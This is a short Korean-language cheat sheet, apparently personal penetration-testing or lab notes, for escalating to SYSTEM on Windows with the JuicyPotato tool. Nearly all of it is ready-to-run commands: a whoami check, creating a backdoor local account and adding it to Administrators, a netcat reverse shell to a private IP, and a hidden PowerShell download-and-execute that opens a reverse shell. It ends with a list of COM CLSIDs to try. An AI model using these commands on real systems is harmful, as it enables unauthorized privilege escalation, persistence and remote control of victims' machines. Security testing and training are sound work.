SYSTEM 권한 확인용 간단 실행. 결과가 NT AUTHORITY\SYSTEM 으로 찍히면 성공.

.\\\\JuicyPotato.exe -l 1337 -p "C:\\\\Windows\\\\System32\\\\cmd.exe" -a "/c whoami /all > C:\\\\Users\\\\merlin\\\\Desktop\\\\jp.txt" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

type C:\\\\Users\\\\merlin\\\\Desktop\\\\jp.txt

새 계정 생성 & 관리자 그룹 추가

# 1) 로컬 유저 생성
.\\\\JuicyPotato.exe -l 1337 -p "cmd.exe" -a "/c net user wook WookPass123! /add" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

# 2) Administrators 그룹에 추가
.\\\\JuicyPotato.exe -l 1337 -p "cmd.exe" -a "/c net localgroup administrators wook /add" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

리버스쉘

# this definitely worked
.\\jp.exe -t * -p c:\\windows\\system32\\cmd.exe -a "/c C:\\Users\\apache\\Desktop\\nc.exe 192.168.45.229 1337 -e cmd.exe" -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}"

# 타겟 윈도우
.\\\\JuicyPotato.exe -l 1337 -p "cmd.exe" -a "/c powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('<http://10.10.14.9/Invoke-PowerShellTcp.ps1>');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4444" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

다른 CLSID

# 가장 먼저 시도할 BITS 서비스 CLSID
{4991d34b-80a1-4291-83b6-3328366b9097}

# 추가로 알려진 것들
{e60687f7-01a1-40aa-86ac-db1cbf673334}
{6d18ad12-bde3-4393-b311-099c346e6df9}
{03ca98d6-ff5d-49b8-abc6-03dd84127020}
{5c6c3c20-0cf4-11d1-b95a-0060977b9152}
{BA126AD1-2166-11D1-B1D0-00805FC1270E}